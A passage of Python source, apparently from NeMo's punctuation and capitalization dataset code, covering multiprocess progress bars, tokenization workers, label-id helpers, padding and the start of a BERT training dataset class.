totals: list of values 100% of progress bars. See more in a description of ``total`` parameter of
``tqdm.tqdm`` function
descriptions: list of descriptions of progress bars. See more in a description of ``desc`` parameter of
``tqdm.tqdm`` function
units: list of progress bar units. See more in a description of ``unit`` parameter of ``tqdm.tqdm`` function
"""
if not all([len(queues) == len(v) for v in [totals, descriptions, units]]):
raise ValueError(
f"All of parameters `queues`, `total_num_lines`, `descriptions`, `units` have to have equal lengths. "
f"len(queues)={len(queues)}, len(total_num_lines)={len(totals)}, "
f"len(descriptions)={len(descriptions)}, len(units)={len(units)}."
)
prog = [
tqdm(total=tt, desc=dd, unit=uu, unit_scale=True, position=i)
for i, (tt, dd, uu) in enumerate(zip(totals, descriptions, units))
]
finished = [False] * len(queues)
while True:
for i, queue in enumerate(queues):
stop = False
to_add = 0
try:
v = queue.get(block=False)
while v != -1:
to_add += v
v = queue.get(block=False)
stop = True
except Empty:
if to_add == 0 and not stop:
continue
prog[i].n += to_add
prog[i].update(0)
if prog[i].n >= totals[i]:
finished[i] = True
prog[i].close()
if stop:
if prog[i].n < totals[i]:
logging.warning(
f"Progress with description '{descriptions[i]}' terminated before progress bar "
f"reached 100%. prog.n={prog[i].n}, total_num_lines={totals[i]}"
)
finished[i] = True
prog[i].close()
if all(finished):
break
sleep(0.1)
class Progress:
"""
Manages several ``tqdm`` progress bars for multi process tasks. This class can be used as a context manager.
The class starts a separate process which creates and updates progress bars. Information is passed to the
progress process via multiprocessing queues. There is a separate queue for every progress bar.
You can use it as context manager:
.. code-block:: python
with Progress([10, 20], ["progress bar 1", "progress bar 2"], ["parrot", "frog"]) as progress_queues:
num_processes = 10
with multiprocessing.Pool(num_processes) as pool:
data = list(zip(my_data, [progress_queues[0]] * num_processes, [progress_queues[1]] * num_processes))
pool.starmap(worker_func, data)
Or without context manager:
.. code-block:: python
progress = Progress([10, 20], ["progress bar 1", "progress bar 2"], ["parrot", "frog"])
progress_queues = progress.get_queue()
num_processes = 10
with multiprocessing.Pool(num_processes) as pool:
data = list(zip(my_data, [progress_queues[0]] * num_processes, [progress_queues[1]] * num_processes))
pool.starmap(worker_func, data)
progress.finish()
In a worker function you will have to put number of processed items into the progress queues. For example:
.. code-block:: python
def worker_func(my_datum, parrot_progress_queue, frog_progress_queue):
...
for i in range(10):
parrot_progress_queue.put(1)
frog_progress_queue.put(2)
Progress bars and progress process are closed when ``finish`` or ``__exit__`` methods are called.
"""
def __init__(self, total: Union[int, List[int]], desc: Union[str, List[str]], unit: Union[str, List[str]]) -> None:
"""
Starts progress process and creates queues for passing information to the progress process. Number of progress
bars is equal to the max length of lists ``total``, ``desc``, ``unit``. If none of these parameters is a list,
then 1 progress bar is created.
Args:
total: a list of ``int`` which length is equal to the number of progress bars OR an ``int`` OR a list of
one ``int``. Number which comprises 100% of progress bar. When sum of values passed through the
corresponding queue equals ``total`` corresponding progress bar reaches 100%. If ``total`` is an
``int`` or a list of one element, then all progress bars have equal ``total`` parameter.
desc: a list of ``str`` which length is equal to the number of progress bars OR a ``str`` OR a list of one
``str``. Description of a progress bar which is showed as a prefix. See more in description of
parameter ``desc`` of function ``tqdm.tqdm``.
unit: a list of ``str`` which length is equal to the number of progress bars OR a ``str`` OR a list of one
``str``. A unit of a progress bar. See more in description of parameter ``unit`` of function
``tqdm.tqdm``.
"""
if not isinstance(total, list):
total = [total]
if not isinstance(desc, list):
desc = [desc]
if not isinstance(unit, list):
unit = [unit]
num_processes = max([len(total), len(desc), len(unit)])
for param in [total, desc, unit]:
if len(param) not in [num_processes, 1]:
raise ValueError(
f"If parameter of `Progress.__init__` method is a list, then it has to be the same length as other "
f"parameters which are lists"
)
if len(param) == 1:
param *= num_processes
manager = mp.Manager()
self.progress_queues = tuple(manager.Queue() for _ in range(num_processes))
self.progress_process = mp.Process(target=_show_prog, args=(self.progress_queues, total, desc, unit))
self.progress_process.start()
def __enter__(self) -> Tuple[mp.Queue, ...]:
return self.get_queues()
def __exit__(self, exc_type, exc_val, exc_tb) -> None:
self.finish()
def get_queues(self) -> Tuple[mp.Queue, ...]:
return self.progress_queues
def finish(self) -> None:
for q in self.progress_queues:
q.put(-1)
self.progress_process.join()
class TokenizeCreateMasksClipWorker:
"""A worker for tokenization, encoding labels, creating masks for first token in a word, sequence clipping"""
def __init__(
self,
max_seq_length: int,
tokenizer: TokenizerSpec,
punct_label_ids: Optional[Dict[str, int]],
capit_label_ids: Optional[Dict[str, int]],
pad_label: str,
verbose: bool,
progress_queue: mp.Queue,
) -> None:
"""
Args:
max_seq_length: max number of tokens in an input sequence including [CLS] and [SEP] tokens. If number of
tokens in a sequence exceeds ``max_seq_length``, then excess tokens in the end of the sequence
are removed
tokenizer: a tokenizer instance which has properties ``cls_id``, ``pad_id``, ``sep_id``, ``unk_id``
punct_label_ids: dict to map punctuation labels to label ids. Starts with pad_label->0.
capit_label_ids: dict to map capitalization labels to label ids. Starts with pad_label->0.
pad_label: pad value used for labels. By default, it's the neutral label for punctuation and capitalization.
Its id in ``punct_label_ids`` and ``capit_label_ids`` has to be ``0``
verbose: whether to report when the worker finishes its job
progress_queue: a multiprocessing queue used for reporting progress. Useful for creating tarred dataset
"""
self.max_seq_length = max_seq_length
self.tokenizer = tokenizer
self.punct_label_ids = punct_label_ids
self.capit_label_ids = capit_label_ids
self.pad_label = pad_label
self.verbose = verbose
self.progress_queue = progress_queue
def _maybe_clip(self, values: List[int], append_value: int) -> List[int]:
if len(values) > self.max_seq_length:
return values[: self.max_seq_length - 1] + [append_value]
return values
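# For example, with max_seq_length=5 the clipping above turns [cls, 11, 12, 13, 14, 15, sep]
# into [cls, 11, 12, 13, sep]: the sequence is cut to max_seq_length - 1 elements and
# `append_value` (here the [SEP] id) is appended. Token ids in this sketch are hypothetical.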
def __call__(
self,
queries: List[str],
punct_label_lines: Optional[Union[List[str], Tuple[str, ...]]],
capit_label_lines: Optional[Union[List[str], Tuple[str, ...]]],
split_i: int,
) -> Tuple[List[np.ndarray], List[np.ndarray], List[np.ndarray], List[np.ndarray]]:
"""
Tokenize, clip, encode labels, and create masks of first tokens in words.
Args:
queries: text sequences
punct_label_lines: a list or a tuple of labels for every word in a sequence (str)
capit_label_lines: a list or a tuple of labels for every word in a sequence (str)
split_i: number of a split which is processed. Used for logging
Returns:
input_ids: a list of 1D int32 arrays. Each array contains token ids of the corresponding query
subtokens_mask: a list of 1D boolean arrays. An array element is ``True`` if corresponding token is the
first token in a word
punct_labels: a list of 1D int32 arrays. Encoded punctuation labels for every token in a query. Tokens in
one word have identical labels
capit_labels: a list of 1D int32 arrays. Encoded capitalization labels for every token in a query. Tokens
in one word have identical labels
"""
all_input_ids, all_subtokens_mask, punct_all_labels, capit_all_labels = [], [], [], []
progress_made = 0
for i, query in enumerate(queries):
words = query.split()
input_ids, subtokens_mask = [self.tokenizer.cls_id], [0]
_check_number_of_labels(words, query, i, split_i, punct_label_lines[i], capit_label_lines[i])
pad_id = self.punct_label_ids[self.pad_label]
punct_labels = [pad_id]
punct_query_labels = [self.punct_label_ids[lab] for lab in punct_label_lines[i]]
capit_labels = [pad_id]
capit_query_labels = [self.capit_label_ids[lab] for lab in capit_label_lines[i]]
for j, word in enumerate(words):
word_ids = self.tokenizer.text_to_ids(word)
if not word_ids and len(word):
word_ids = [self.tokenizer.unk_id]
input_ids.extend(word_ids)
subtokens_mask.append(1)
subtokens_mask.extend([0] * (len(word_ids) - 1))
punct_labels.extend([punct_query_labels[j]] * len(word_ids))
capit_labels.extend([capit_query_labels[j]] * len(word_ids))
# add eos token
input_ids.append(self.tokenizer.sep_id)
subtokens_mask.append(0)
all_input_ids.append(np.array(self._maybe_clip(input_ids, self.tokenizer.sep_id), dtype=np.int32))
all_subtokens_mask.append(np.array(self._maybe_clip(subtokens_mask, 0), dtype=bool))
punct_labels.append(pad_id)
punct_all_labels.append(np.array(self._maybe_clip(punct_labels, pad_id), dtype=np.int32))
capit_labels.append(pad_id)
capit_all_labels.append(np.array(self._maybe_clip(capit_labels, pad_id), dtype=np.int32))
progress_made += 1
if progress_made >= TOKENIZATION_PROGRESS_REPORT_PERIOD:
self.progress_queue.put(progress_made)
progress_made = 0
self.progress_queue.put(progress_made)
if self.verbose:
logging.info(f"Finished processing data split number {split_i}")
return all_input_ids, all_subtokens_mask, punct_all_labels, capit_all_labels
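# Sketch of the mark-up produced for one query "hello world" whose words tokenize into 2 and 1
# subtokens respectively (token and label ids below are hypothetical):
#   input_ids      = [cls, 37, 41, 52, sep]
#   subtokens_mask = [0,   1,  0,  1,  0]
#   punct_labels   = [pad, p0, p0, p1, pad]   # a word's label is repeated over all its subtokens
#   capit_labels   = [pad, c0, c0, c1, pad]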
def _get_features(
queries: Union[List[str], Tuple[str, ...]],
punct_label_lines: Union[List[str], Tuple[str, ...]],
capit_label_lines: Union[List[str], Tuple[str, ...]],
max_seq_length: int,
tokenizer: TokenizerSpec,
punct_label_ids: Dict[str, int] = None,
capit_label_ids: Dict[str, int] = None,
pad_label: str = 'O',
verbose: bool = True,
n_jobs: Optional[int] = 0,
progress_queue: Optional[mp.Queue] = None,
) -> Tuple[List[np.ndarray], List[np.ndarray], List[np.ndarray], List[np.ndarray]]:
"""
Tokenizes data, encodes labels, creates masks of first tokens in words, clips sequences by number of tokens.
Args:
queries: text sequences
max_seq_length: max number of tokens in an input sequence including [CLS] and [SEP] tokens. If number of tokens
in a sequence exceeds ``max_seq_length``, then excess tokens in the end of the sequence are removed
tokenizer: a tokenizer instance which has properties ``cls_id``, ``pad_id``, ``sep_id``, ``unk_id``
punct_label_ids: dict to map punctuation labels to label ids. Starts with pad_label->0.
capit_label_ids: dict to map capitalization labels to label ids. Starts with pad_label->0.
pad_label: pad value used for labels. By default, it's the neutral label for punctuation and capitalization.
Its id in ``punct_label_ids`` and ``capit_label_ids`` has to be ``0``
punct_label_lines: a list or a tuple of labels for every word in a sequence (str)
capit_label_lines: a list or a tuple of labels for every word in a sequence (str)
verbose: whether to show examples of tokenized data and various progress information
n_jobs: a number of workers used for preparing features. If ``n_jobs <= 0``, then do not use multiprocessing
and run features creation in this process. If not set, number of workers will be equal to the number of
CPUs.
!!WARNING!!
There can be deadlocking problems with some tokenizers (e.g. SentencePiece, HuggingFace AlBERT)
if ``n_jobs > 0``.
progress_queue: a multiprocessing queue used for reporting progress. Useful for creating tarred dataset
Returns:
input_ids: a list of 1D int32 arrays. Each array contains token ids of corresponding query
subtokens_mask: a list of 1D boolean arrays. An array element is ``True`` if corresponding token is the
first token in a word
punct_labels: a list of 1D int32 arrays. Encoded punctuation labels for every token in a query. Tokens in one
word have identical labels.
capit_labels: a list of 1D int32 arrays. Encoded capitalization labels for every token in a query. Tokens in
one word have identical labels
"""
if verbose:
logging.info("Start initial tokenization.")
create_progress_process = progress_queue is None
if n_jobs is None:
n_jobs = min(mp.cpu_count(), len(queries))
if verbose:
logging.info(f"Running tokenization with {n_jobs} jobs.")
# Number of queries in split
split_size = min(len(queries) // max(n_jobs, 1), MAX_NUM_QUERIES_IN_SPLIT)
n_split = len(queries) // split_size
split_queries = [queries[split_size * i : split_size * (i + 1)] for i in range(n_split - 1)] + [
queries[split_size * (n_split - 1) :]
]
split_punct_labels_lines = [
punct_label_lines[split_size * i : split_size * (i + 1)] for i in range(n_split - 1)
] + [punct_label_lines[split_size * (n_split - 1) :]]
split_capit_labels_lines = [
capit_label_lines[split_size * i : split_size * (i + 1)] for i in range(n_split - 1)
] + [capit_label_lines[split_size * (n_split - 1) :]]
args = list(zip(split_queries, split_punct_labels_lines, split_capit_labels_lines, range(n_split)))
if create_progress_process:
progress = Progress(len(queries), "Tokenization", "query")
progress_queue = progress.get_queues()[0]
if n_jobs > 0:
with mp.Pool(n_jobs) as pool:
result = pool.starmap(
TokenizeCreateMasksClipWorker(
max_seq_length, tokenizer, punct_label_ids, capit_label_ids, pad_label, verbose, progress_queue
),
args,
)
else:
result = []
for x in args:
result.append(
TokenizeCreateMasksClipWorker(
max_seq_length, tokenizer, punct_label_ids, capit_label_ids, pad_label, verbose, progress_queue,
)(*x)
)
if create_progress_process:
progress.finish()
input_ids, subtokens_mask, punct_labels, capit_labels = tuple(list(itertools.chain(*e)) for e in zip(*result))
if verbose:
logging.info("Finished initial tokenization.")
get_stats([len(inp) for inp in input_ids])
logging.info(f"Finished clipping and padding.")
for i in range(min(len(input_ids), 5)):
logging.info("*** Example ***")
logging.info("i: %s" % (i))
logging.info("subtokens: %s" % " ".join(list(map(str, input_ids[i]))))
logging.info("subtokens_mask: %s" % " ".join(list(map(str, subtokens_mask[i]))))
logging.info("punct_labels: %s" % " ".join(list(map(str, punct_labels[i]))))
logging.info("capit_labels: %s" % " ".join(list(map(str, capit_labels[i]))))
return input_ids, subtokens_mask, punct_labels, capit_labels
def create_masks_and_segment_ids(
input_ids: np.ndarray,
subtokens_mask: np.ndarray,
pad_id: int,
cls_id: int,
sep_id: int,
ignore_start_end: bool,
ignore_extra_tokens: bool,
) -> Tuple[np.ndarray, np.ndarray, np.ndarray]:
"""
Creates segment ids array, input mask, loss mask.
Segment ids array is BERT token type ids in HuggingFace terminology. It is a zeros array for punctuation
and capitalization task.
Input mask element is ``True`` if an element of ``input_ids`` is not padding and ``False`` otherwise.
Loss mask element is ``True`` for the first token in a word. If ``ignore_start_end=False``, then loss mask
element is ``True`` for [CLS] and [SEP] tokens. If ``ignore_extra_tokens=False``, then loss mask element is ``True``
for all word tokens. In all other cases loss mask elements are ``False``.
Args:
input_ids: an integer array of shape ``[Batch, Time]`` containing ids of source token ids
subtokens_mask: a boolean array of shape ``[Batch, Time]`` which elements are ``True`` if they correspond to
the first token of some word
pad_id: an id of padding token
cls_id: an id of [CLS] token
sep_id: an id of [SEP] token
ignore_start_end: whether to compute loss for [CLS] and [SEP] tokens
ignore_extra_tokens: whether to compute loss for not first tokens in words
Returns:
segment_ids: int8 array of shape [Batch, Time]
input_mask: boolean array of shape [Batch, Time]
loss_mask: boolean array of shape [Batch, Time]
"""
segment_ids = np.zeros_like(input_ids, dtype=np.int8)
input_mask = np.not_equal(input_ids, pad_id)
special_mask = np.equal(input_ids, cls_id) | np.equal(input_ids, sep_id)
if ignore_start_end:
if ignore_extra_tokens:
loss_mask = subtokens_mask
else:
loss_mask = input_mask & ~special_mask
else:
if ignore_extra_tokens:
loss_mask = subtokens_mask | special_mask
else:
loss_mask = input_mask
return segment_ids, input_mask, loss_mask
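# A small worked example (token ids are hypothetical: pad_id=0, cls_id=101, sep_id=102):
#   input_ids      = np.array([[101, 7, 8, 102, 0]])
#   subtokens_mask = np.array([[False, True, False, False, False]])
#   segment_ids, input_mask, loss_mask = create_masks_and_segment_ids(
#       input_ids, subtokens_mask, pad_id=0, cls_id=101, sep_id=102,
#       ignore_start_end=True, ignore_extra_tokens=True,
#   )
#   # segment_ids -> [[0, 0, 0, 0, 0]]
#   # input_mask  -> [[True, True, True, True, False]]
#   # loss_mask   -> [[False, True, False, False, False]]  (only first tokens of words)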
def create_label_ids(unique_labels: Set[str], pad_label: str) -> Dict[str, int]:
"""
Returns label ids dictionary. ``pad_label`` always has id ``0``. Other labels are sorted in alphabetical order.
Args:
unique_labels: a set of labels from which the label ids dictionary is created. May or may not contain ``pad_label``
pad_label: label used for padding. It is also a neutral label
Returns:
label ids dictionary
"""
label_ids = {pad_label: 0}
if pad_label in unique_labels:
unique_labels.remove(pad_label)
for label in sorted(unique_labels):
label_ids[label] = len(label_ids)
return label_ids
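# For instance (hypothetical label set):
#   create_label_ids({'O', ',', '?'}, pad_label='O')  ->  {'O': 0, ',': 1, '?': 2}
# 'O' always gets id 0, and the remaining labels receive ids in alphabetical order.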
def load_label_ids(file_path: Union[str, os.PathLike]) -> Dict[str, int]:
ids = {}
with open(file_path) as f:
for i, line in enumerate(f):
ids[line.strip()] = i
return ids
def save_label_ids(label_ids: Dict[str, int], file_path: Path) -> None:
"""
Saves a label ids map to a file. Each line of the file contains one label. Labels are saved in order of
increasing ids.
Args:
label_ids: label id dictionary. Pad label has to have id ``0``
file_path: path to a file where labels will be saved
"""
file_path.parent.mkdir(parents=True, exist_ok=True)
with file_path.open('w') as out:
labels, _ = zip(*sorted(label_ids.items(), key=lambda x: x[1]))
out.write('\n'.join(labels))
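# Round-trip sketch (the file name is a placeholder):
#   save_label_ids({'O': 0, ',': 1}, Path('punct_label_ids.csv'))
#   load_label_ids('punct_label_ids.csv')  ->  {'O': 0, ',': 1}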
def raise_not_equal_labels_error(
first_labels: Dict[str, int], second_labels: Dict[str, int], first_labels_desc: str, second_labels_desc: str
) -> None:
"""
A helper function for raising comprehensible error if labels from 2 sources are different.
Such sources may include:
- labels stored in .nemo checkpoint
- labels stored in tarred dataset
- labels passed in config parameters ``model.common_dataset_parameters.{punct_label_ids,capit_label_ids}``
- labels from files passed in config parameters ``model.class_labels.{punct_labels_file,capit_labels_file}``
- labels in attributes ``PunctuationCapitalizationModel.{punct_label_ids,capit_label_ids}``
- any other source
This function helps to detect label configuration errors early and gives error messages that are easy to interpret.
Call this function if ``first_labels != second_labels``.
Args:
first_labels: first dictionary with labels
second_labels: second dictionary with labels
first_labels_desc: a description of first labels
second_labels_desc: a description of second labels
"""
missing_in_first = {k: second_labels[k] for k in set(second_labels) - set(first_labels)}
missing_in_second = {k: first_labels[k] for k in set(first_labels) - set(second_labels)}
not_equal = {
k: {'FIRST LABELS': first_labels[k], 'SECOND LABELS': second_labels[k]}
for k in set(first_labels) & set(second_labels)
if first_labels[k] != second_labels[k]
}
msg = f"{first_labels_desc} (FIRST LABELS) are not equal to {second_labels_desc} (SECOND LABELS)."
if len(missing_in_first) > 0:
msg += f" Number of SECOND LABELS missing in the FIRST LABELS: {len(missing_in_first)}."
if len(missing_in_second) > 0:
msg += f" Number of FIRST LABELS missing in the SECOND LABELS: {len(missing_in_second)}."
if len(not_equal) > 0:
msg += f" Number of labels which are not equal: {len(not_equal)}."
if len(missing_in_first) > 0:
msg += (
f" Several examples of missing SECONDS LABELS in the FIRST LABELS: "
f"{dict(list(missing_in_first.items())[:3])}."
)
if len(missing_in_second) > 0:
msg += (
f" Several examples of missing FIRST LABELS in the SECOND LABELS: "
f"{dict(list(missing_in_second.items())[:3])}."
)
if len(not_equal) > 0:
msg += f" Several examples of labels which are not equal: {dict(list(not_equal.items())[:3])}"
raise ValueError(msg)
def pad(vectors: List[np.ndarray], length: int, value: Union[int, float, bool]) -> np.ndarray:
"""
Pad vectors to length ``length`` and then stack.
Args:
vectors: a list of 1D arrays. Arrays to pad and stack
length: a length of padded sequence. Has to be greater or equal to the maximum length of an element of
``vectors``.
value: a value used for padding
Returns:
an array of padded vectors
"""
result = []
for v in vectors:
result.append(np.concatenate([v, np.full([length - v.shape[0]], value, dtype=v.dtype)]))
return np.stack(result)
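# For example (hypothetical vectors):
#   pad([np.array([1, 2, 3]), np.array([4])], length=4, value=0)
#   ->  array([[1, 2, 3, 0],
#              [4, 0, 0, 0]])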
class BertPunctuationCapitalizationDataset(Dataset):
"""
A dataset to use during training for punctuation and capitalization tasks.
For inference, you will need
:class:`~nemo.collections.nlp.data.token_classification.punctuation_capitalization_infer_dataset.BertPunctuationCapitalizationInferDataset`.
For huge datasets which cannot be loaded into memory simultaneously use
:class:`~nemo.collections.nlp.data.token_classification.punctuation_capitalization_tarred_dataset.BertPunctuationCapitalizationTarredDataset`.
Args:
text_file (:obj:`Union[str, os.PathLike]`): a path to a file with sequences, each line should contain a text
without punctuation and capitalization
labels_file (:obj:`Union[str, os.PathLike]`): a path to a file with labels, each line corresponds to word
labels for a sentence in the ``text_file``. Labels have to follow format described in this section of
documentation :ref:`NeMo Data Format<nemo-data-format-label>`.
max_seq_length (:obj:`int`): max number of tokens in a source sequence. ``max_seq_length`` includes [CLS]
and [SEP] tokens. Sequences which are too long will be clipped by removal of tokens from the end of the
sequence.
tokenizer (:obj:`TokenizerSpec`): a tokenizer instance which has properties ``unk_id``, ``sep_id``, ``bos_id``,
``eos_id``.
num_samples (:obj:`int`, `optional`, defaults to :obj:`-1`): a number of samples you want to use for the
dataset. If ``-1``, use all dataset. Useful for testing.
tokens_in_batch (:obj:`int`, `optional`, defaults to :obj:`5000`): number of tokens in a batch including
paddings and special tokens ([CLS], [SEP], [UNK]). This class :meth:`__getitem__` method returns not
samples but ready batches. Number of samples in a batch is adjusted for input sequences lengths. If input
sequences are short, then a batch will contain more samples. Before packing into batches, samples are
sorted by the number of tokens they contain. Sorting allows reducing the number of pad tokens in a batch
significantly. Regular PyTorch data loader shuffling will only permute batches without changing their content.
Proper shuffling is achieved via calling method :meth:`repack_batches_with_shuffle` every epoch. If
parameter ``number_of_batches_is_multiple_of`` is greater than 1, some batches may be split into smaller
pieces.
pad_label (:obj:`str`, `optional`, defaults to :obj:`'O'`): pad value to use for labels. It's also the neutral
label both for punctuation and capitalization.
punct_label_ids (:obj:`Dict[str, int]`, `optional`): dict to map punctuation labels to label ids. For dev set,
use label ids generated during training to support cases when not all labels are present in the dev set.
For training, it is recommended to set ``punct_label_ids`` to ``None`` or load from cache.
capit_label_ids (:obj:`Dict[str, int]`, `optional`): same as ``punct_label_ids`` for capitalization labels.
ignore_extra_tokens (:obj:`bool`, `optional`, defaults to :obj:`False`): whether to compute loss on
tokens which are not first tokens in a word. For example, assume that word ``'tokenization'`` is tokenized
into ``['token', 'ization']``. If ``ignore_extra_tokens=True``, loss mask for the word is
``[True, False]``, and if ``ignore_extra_tokens=False``, then loss mask is ``[True, True]``.
ignore_start_end (:obj:`bool`, `optional`, defaults to :obj:`True`): whether to ignore [CLS] and [SEP] tokens
in the loss_mask.
use_cache (:obj:`bool`, `optional`, defaults to :obj:`True`): whether to use pickled features already present
in ``cache_dir`` or not. If pickled features file does not exist or ``use_cache=False``, then features are
pickled in ``cache_dir``. Pickled features include input ids, subtokens mask (mask of first tokens in
words), encoded punctuation and capitalization labels, label ids. Features creation consumes considerable
time and this ``use_cache=True`` significantly speeds up training starting. Pickled features are also
used for sharing features between processes if data parallel training is used.
cache_dir (:obj:`Union[str, os.PathLike]`, `optional`): a path to a directory where cache (pickled features)
is stored. By default, ``text_file`` parent directory is used. This parameter is useful if dataset
directory is read-only and you wish to pickle features. In such a case specify a path to directory which
allows writing in ``cache_dir`` parameter.
get_label_frequencies (:obj:`bool`, `optional`, defaults to :obj:`False`): whether to print and save label
frequencies. Frequencies are shown if the ``verbose`` parameter is ``True``. If
``get_label_frequencies=True``, then frequencies are saved into the ``label_info_save_dir`` directory.
label_info_save_dir (:obj:`Union[str, os.PathLike]`, `optional`): a path to a directory where label frequencies
are saved. By default the ``text_file`` parent directory is used. When method
:meth:`save_labels_and_get_file_paths` is called label ids are saved into ``label_info_save_dir``
directory. This parameter is useful if directory containing ``text_file`` is read-only.
punct_label_vocab_file (:obj:`Union[str, os.PathLike]`, `optional`): a path to a .csv file containing
punctuation label vocabulary. Each line in such a vocabulary file contains exactly one label. The first
line has to contain `pad_label`, otherwise an error will be raised.
capit_label_vocab_file (:obj:`Union[str, os.PathLike]`, `optional`): same as ``punct_label_vocab_file`` for
capitalization labels.
add_masks_and_segment_ids_to_batch (:obj:`bool`, `optional`, defaults to :obj:`True`): whether to add
``'loss_mask'``, ``'input_mask'``, ``'segment_ids'`` items to a batch. Useful for creation of tarred
dataset and can NOT be used during model training and inference.
verbose (:obj:`bool`, `optional`, defaults to :obj:`True`): whether to show data examples, label stats and
other useful information.
n_jobs (:obj:`int`, `optional`, defaults to :obj:`0`): number of workers used for tokenization, encoding
labels, creating "first token in word" mask, and clipping. If ``n_jobs <= 0`` data preparation is performed
without multiprocessing. By default ``n_jobs`` is ``0``.
.. warning::
There can be deadlocking problems with some tokenizers (e.g. SentencePiece, HuggingFace AlBERT)
if ``n_jobs > 0``.
number_of_batches_is_multiple_of (:obj:`int`, `optional`, defaults to :obj:`1`): number of batches in the
dataset is made divisible by ``number_of_batches_is_multiple_of``. If ``number_of_batches_is_multiple_of``
is greater than 1, then several batches are split into parts until the number of batches
is divisible by ``number_of_batches_is_multiple_of``. If there are not enough queries in the dataset to
create enough batches, then a warning is printed. This parameter is useful for dev and validation datasets
if multiple GPUs are used. The problem is that if number of batches is not evenly divisible by number of
GPUs, then some queries may be processed several times and metrics will be distorted.
batch_shuffling_random_seed (:obj:`int`, defaults to :obj:`42`): a random seed used for batch repacking and
shuffling.
tokenization_progress_queue (:obj:`multiprocessing.Queue`, `optional`): a queue for reporting tokenization
progress. Useful for creation of tarred dataset
batch_mark_up_progress_queue (:obj:`multiprocessing.Queue`, `optional`): a queue for reporting progress in
deciding which samples batches will contain. Useful for creation of tarred dataset
batch_building_progress_queue (:obj:`multiprocessing.Queue`, `optional`): a queue for reporting progress in
batch creation (stacking and padding). Useful for creation of tarred dataset
"""
@property
def output_types(self) -> Optional[Dict[str, NeuralType]]:
"""Returns definitions of module output ports. """
return {
'input_ids': NeuralType(('B', 'T'), ChannelType()),
'segment_ids': NeuralType(('B', 'T'), ChannelType()),
'input_mask': NeuralType(('B', 'T'), MaskType()),
'subtokens_mask': NeuralType(('B', 'T'), MaskType()),
'loss_mask': NeuralType(('B', 'T'), MaskType()),
'punct_labels': NeuralType(('B', 'T'), LabelsType()),
'capit_labels': NeuralType(('B', 'T'), LabelsType()),
}
def __init__(
self,
text_file: Union[str, os.PathLike],
labels_file: Union[str, os.PathLike],
max_seq_length: int,
tokenizer: TokenizerSpec,
num_samples: int = -1,
tokens_in_batch: int = 5000,
pad_label: str = 'O',
punct_label_ids: Optional[Union[Dict[str, int], DictConfig]] = None,
capit_label_ids: Optional[Union[Dict[str, int], DictConfig]] = None,
ignore_extra_tokens: bool = False,
ignore_start_end: bool = True,
use_cache: bool = True,
cache_dir: Optional[Union[str, os.PathLike]] = None,
get_label_frequencies: bool = False,
label_info_save_dir: Optional[Union[str, os.PathLike]] = None,
punct_label_vocab_file: Optional[Union[str, os.PathLike]] = None,
capit_label_vocab_file: Optional[Union[str, os.PathLike]] = None,
add_masks_and_segment_ids_to_batch: bool = True,
verbose: bool = True,
n_jobs: Optional[int] = 0,
number_of_batches_is_multiple_of: int = 1,
batch_shuffling_random_seed: int = 42,
tokenization_progress_queue: Optional[mp.Queue] = None,
batch_mark_up_progress_queue: Optional[mp.Queue] = None,
batch_building_progress_queue: Optional[mp.Queue] = None,
use_features: bool = True
) -> None:
""" Initializes BertPunctuationCapitalizationDataset. """
if isinstance(punct_label_ids, DictConfig):
punct_label_ids = OmegaConf.to_container(punct_label_ids)
if isinstance(capit_label_ids, DictConfig):
capit_label_ids = OmegaConf.to_container(capit_label_ids)
self._check_constructor_parameters(
text_file,
labels_file,
punct_label_ids,
capit_label_ids,
punct_label_vocab_file,
capit_label_vocab_file,
num_samples,
use_cache,
number_of_batches_is_multiple_of,
)
if punct_label_vocab_file is not None:
punct_label_vocab_file = Path(punct_label_vocab_file).expanduser()
punct_label_ids = load_label_ids(punct_label_vocab_file)
if capit_label_vocab_file is not None:
capit_label_vocab_file = Path(capit_label_vocab_file).expanduser()
capit_label_ids = load_label_ids(capit_label_vocab_file)
self.text_file, self.labels_file = Path(text_file).expanduser(), Path(labels_file).expanduser()
if label_info_save_dir is None:
self.label_info_save_dir = self.text_file.parent
else:
self.label_info_save_dir = Path(label_info_save_dir).expanduser()
self.tokens_in_batch = tokens_in_batch
self.tokenizer = tokenizer
self.pad_label = pad_label
self.ignore_extra_tokens = ignore_extra_tokens
self.ignore_start_end = ignore_start_end
self.add_masks_and_segment_ids_to_batch = add_masks_and_segment_ids_to_batch
self.verbose = verbose
self.batch_mark_up_progress_queue = batch_mark_up_progress_queue
self.batch_building_progress_queue = batch_building_progress_queue
self.use_features = use_features
master_device = is_global_rank_zero()
self.features_pkl = self._get_path_to_pkl_features(self.text_file, cache_dir, max_seq_length, num_samples)
features = None
if master_device and not (self.features_pkl.is_file() and use_cache):
if verbose:
logging.info(f'Processing {self.text_file}')
res = self._read_dataset(self.text_file, self.labels_file, num_samples)
text_lines, punct_label_lines, capit_label_lines, punct_unique_labels, capit_unique_labels = res
if punct_label_ids:
self._check_label_ids_vs_unique_labels(
punct_label_ids, punct_unique_labels, 'punct', 'punctuation', self.labels_file
)
else:
punct_label_ids = create_label_ids(punct_unique_labels, self.pad_label)
if capit_label_ids:
self._check_label_ids_vs_unique_labels(
capit_label_ids, capit_unique_labels, 'capit', 'capitalization', self.labels_file
)
else:
capit_label_ids = create_label_ids(capit_unique_labels, self.pad_label)
features = _get_features(
text_lines,
punct_label_lines,
capit_label_lines,
max_seq_length,
self.tokenizer,
pad_label=self.pad_label,
punct_label_ids=punct_label_ids,
capit_label_ids=capit_label_ids,
verbose=self.verbose,
progress_queue=tokenization_progress_queue,
n_jobs=n_jobs,
)
self.features_pkl.parent.mkdir(parents=True, exist_ok=True)
pickle.dump(tuple(list(features) + [punct_label_ids, capit_label_ids]), self.features_pkl.open("wb"))
if self.verbose:
logging.info(f'Features saved to {self.features_pkl}')
# wait until the master process writes to the processed data files
if torch.distributed.is_initialized():
torch.distributed.barrier()
if features is None:
features = pickle.load(self.features_pkl.open('rb'))
li = features[-2:]
self._check_label_ids_loaded_from_pkl(
punct_label_ids, capit_label_ids, *li, punct_label_vocab_file, capit_label_vocab_file
)
punct_label_ids, capit_label_ids = li[-2], li[-1]
if tokenization_progress_queue is not None:
tokenization_progress_queue.put(len(features[0]))
if self.verbose:
logging.info(f'Features restored from {self.features_pkl}')
features = features[:-2]
self.input_ids, self.subtokens_mask, self.punct_labels, self.capit_labels = features
self.punct_label_ids, self.capit_label_ids = punct_label_ids, capit_label_ids
self.number_of_batches_is_multiple_of = number_of_batches_is_multiple_of
self.batch_shuffling_random_state = np.random.RandomState(batch_shuffling_random_seed)
if not self.use_features:
return
self.batches = self._pack_into_batches(
